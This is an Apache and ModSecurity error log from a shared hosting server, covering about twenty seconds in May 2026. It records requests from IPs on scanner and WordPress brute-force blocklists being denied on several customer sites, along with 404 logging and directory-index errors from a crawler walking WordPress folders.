[Tue May 26 17:18:14.614506 2026] [security2:error] [pid 869189:tid 869383] [client 20.205.111.246:1497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWIftB5TZSn88J_orr4hgAAAD8"]
[Tue May 26 17:18:15.355964 2026] [security2:error] [pid 869189:tid 869420] [client 20.205.111.246:10464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/xx.php"] [unique_id "ahWIf9B5TZSn88J_orr4nQAAAGQ"]
[Tue May 26 17:18:16.327883 2026] [security2:error] [pid 869189:tid 869362] [client 20.205.111.246:6376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/xmlrpc.php"] [unique_id "ahWIgNB5TZSn88J_orr4rgAAACo"]
[Tue May 26 17:18:16.386937 2026] [security2:error] [pid 869189:tid 869330] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIf9B5TZSn88J_orr4qQAAAAo"]
[Tue May 26 17:18:16.452309 2026] [security2:error] [pid 869189:tid 869292] [remote 211.23.68.235:3539] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWIgNB5TZSn88J_orr4uAAAPGU"]
[Tue May 26 17:18:17.092068 2026] [security2:error] [pid 869189:tid 869373] [client 20.205.111.246:8250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/y.php"] [unique_id "ahWIgdB5TZSn88J_orr4zQAAADU"]
[Tue May 26 17:18:17.430962 2026] [security2:error] [pid 869189:tid 869289] [remote 160.250.186.220:40946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIgdB5TZSn88J_orr40gAAPmI"]
[Tue May 26 17:18:18.310649 2026] [security2:error] [pid 869189:tid 869363] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIgdB5TZSn88J_orr44QAAACs"]
[Tue May 26 17:18:18.776881 2026] [security2:error] [pid 869189:tid 869324] [client 95.129.101.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWIgtB5TZSn88J_orr49QAAAAQ"]
[Tue May 26 17:18:19.847141 2026] [security2:error] [pid 869189:tid 869343] [client 146.174.160.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIg9B5TZSn88J_orr5EQAAABc"]
[Tue May 26 17:18:19.944717 2026] [security2:error] [pid 869189:tid 869440] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIg9B5TZSn88J_orr5HQAAAHg"]
[Tue May 26 17:18:20.756833 2026] [security2:error] [pid 869189:tid 869406] [client 112.42.92.247:7375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.92.42.112.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWIhNB5TZSn88J_orr5KgAAAFY"], referer: https://www.cagmedya.com/
[Tue May 26 17:18:20.980570 2026] [autoindex:error] [pid 869189:tid 869401] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/maint/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:21.524346 2026] [security2:error] [pid 869189:tid 869382] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIhdB5TZSn88J_orr5RgAAAD4"]
[Tue May 26 17:18:22.108234 2026] [security2:error] [pid 869189:tid 869358] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIhdB5TZSn88J_orr5WQAAACY"]
[Tue May 26 17:18:22.122377 2026] [security2:error] [pid 869189:tid 869332] [client 223.235.98.214:16294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIhtB5TZSn88J_orr5XgAAAAw"]
[Tue May 26 17:18:22.123113 2026] [security2:error] [pid 869189:tid 869332] [client 223.235.98.214:16294] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIhtB5TZSn88J_orr5XgAAAAw"]
[Tue May 26 17:18:22.404737 2026] [autoindex:error] [pid 869189:tid 869337] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:22.756551 2026] [security2:error] [pid 869189:tid 869324] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIhtB5TZSn88J_orr5bAAAAAQ"]
[Tue May 26 17:18:23.211656 2026] [security2:error] [pid 869189:tid 869344] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIhtB5TZSn88J_orr5dAAAABg"]
[Tue May 26 17:18:23.518762 2026] [security2:error] [pid 869189:tid 869418] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIh9B5TZSn88J_orr5fQAAAGI"]
[Tue May 26 17:18:23.633085 2026] [security2:error] [pid 869189:tid 869442] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIh9B5TZSn88J_orr5jgAAAHo"]
[Tue May 26 17:18:24.028266 2026] [security2:error] [pid 869189:tid 869444] [client 203.194.101.7:59288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIiNB5TZSn88J_orr5nQAAAHw"]
[Tue May 26 17:18:24.028428 2026] [security2:error] [pid 869189:tid 869444] [client 203.194.101.7:59288] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIiNB5TZSn88J_orr5nQAAAHw"]
[Tue May 26 17:18:24.183979 2026] [security2:error] [pid 869189:tid 869421] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIiNB5TZSn88J_orr5oAAAAGU"]
[Tue May 26 17:18:24.756052 2026] [security2:error] [pid 869189:tid 869370] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIiNB5TZSn88J_orr5sAAAADI"]
[Tue May 26 17:18:25.193882 2026] [security2:error] [pid 869189:tid 869445] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIidB5TZSn88J_orr5wwAAAH0"]
[Tue May 26 17:18:25.234801 2026] [security2:error] [pid 869189:tid 869425] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIiNB5TZSn88J_orr5twAAAGk"]
[Tue May 26 17:18:25.737396 2026] [security2:error] [pid 869189:tid 869334] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIidB5TZSn88J_orr52AAAAA4"]
[Tue May 26 17:18:26.615836 2026] [autoindex:error] [pid 869189:tid 869396] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:26.926284 2026] [security2:error] [pid 869189:tid 869447] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIitB5TZSn88J_orr5-QAAAH8"]
[Tue May 26 17:18:27.493071 2026] [autoindex:error] [pid 869189:tid 869423] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/style-engine/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:27.838602 2026] [security2:error] [pid 869189:tid 869421] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIi9B5TZSn88J_orr6IwAAAGU"]
[Tue May 26 17:18:28.349354 2026] [security2:error] [pid 869189:tid 869381] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIi9B5TZSn88J_orr6KgAAAD0"]
[Tue May 26 17:18:28.616560 2026] [security2:error] [pid 869189:tid 869383] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIjNB5TZSn88J_orr6QgAAAD8"]
[Tue May 26 17:18:29.278581 2026] [autoindex:error] [pid 869189:tid 869391] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:29.467800 2026] [autoindex:error] [pid 869189:tid 869355] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-content/upgrade/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:29.659583 2026] [security2:error] [pid 869189:tid 869221] [remote 178.156.182.155:43276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWIjdB5TZSn88J_orr6YQAAJB4"]
[Tue May 26 17:18:29.896935 2026] [security2:error] [pid 869189:tid 869365] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIjdB5TZSn88J_orr6aAAAAC0"]
[Tue May 26 17:18:30.082507 2026] [security2:error] [pid 869189:tid 869227] [remote 216.185.214.209:53560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIjdB5TZSn88J_orr6cAAAICQ"]
[Tue May 26 17:18:30.896912 2026] [security2:error] [pid 869189:tid 869445] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIjtB5TZSn88J_orr6iAAAAH0"]
[Tue May 26 17:18:31.140727 2026] [security2:error] [pid 869189:tid 869392] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIjtB5TZSn88J_orr6mgAAAEg"]
[Tue May 26 17:18:31.506061 2026] [autoindex:error] [pid 869189:tid 869413] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/IXR/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:31.696665 2026] [autoindex:error] [pid 869189:tid 869429] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:31.914194 2026] [autoindex:error] [pid 869189:tid 869353] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/images/smilies/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:32.165991 2026] [autoindex:error] [pid 869189:tid 869329] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/crop/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:32.372941 2026] [autoindex:error] [pid 869189:tid 869340] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/PHPMailer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:32.528421 2026] [security2:error] [pid 869189:tid 869430] [client 209.163.117.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIkNB5TZSn88J_orr6zQAAAG4"], referer: https://www.anujtradingco.com/
[Tue May 26 17:18:32.806091 2026] [cgid:error] [pid 869189:tid 869427] [client 185.92.25.54:0] AH01265: stderr from /home2/whitece9/bookmyitem.com/cgi-bin/: attempt to invoke directory as script
[Tue May 26 17:18:32.892448 2026] [security2:error] [pid 869189:tid 869348] [client 223.235.98.214:29168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIkNB5TZSn88J_orr64wAAABw"]
[Tue May 26 17:18:32.892646 2026] [security2:error] [pid 869189:tid 869348] [client 223.235.98.214:29168] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIkNB5TZSn88J_orr64wAAABw"]
[Tue May 26 17:18:32.943218 2026] [security2:error] [pid 869189:tid 869420] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIkNB5TZSn88J_orr60AAAAGQ"]
[Tue May 26 17:18:33.055631 2026] [autoindex:error] [pid 869189:tid 869423] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:33.287426 2026] [autoindex:error] [pid 869189:tid 869429] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/js/jquery/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:33.546566 2026] [autoindex:error] [pid 869189:tid 869376] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/block-supports/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:33.994464 2026] [security2:error] [pid 869189:tid 869363] [client 209.163.117.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWIkdB5TZSn88J_orr6_QAAACs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1512725&moderation-hash=9cac9426cda284c1689d2fc3f62360c2
[Tue May 26 17:18:34.401530 2026] [security2:error] [pid 869189:tid 869372] [client 203.194.101.7:59626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIktB5TZSn88J_orr7CwAAADQ"]
[Tue May 26 17:18:34.402234 2026] [security2:error] [pid 869189:tid 869372] [client 203.194.101.7:59626] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIktB5TZSn88J_orr7CwAAADQ"]
[Tue May 26 17:18:34.540123 2026] [security2:error] [pid 869189:tid 869361] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIktB5TZSn88J_orr7CgAAACk"]
[Tue May 26 17:18:35.093120 2026] [security2:error] [pid 869189:tid 869394] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIktB5TZSn88J_orr7FAAAAEo"]
[Tue May 26 17:18:35.265840 2026] [autoindex:error] [pid 869189:tid 869358] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:35.498786 2026] [autoindex:error] [pid 869189:tid 869332] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/customize/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:35.720750 2026] [autoindex:error] [pid 869189:tid 869337] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/SimplePie/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:36.084417 2026] [autoindex:error] [pid 869189:tid 869441] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/theme-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:36.265849 2026] [autoindex:error] [pid 869189:tid 869357] [client 185.92.25.54:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/Requests/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
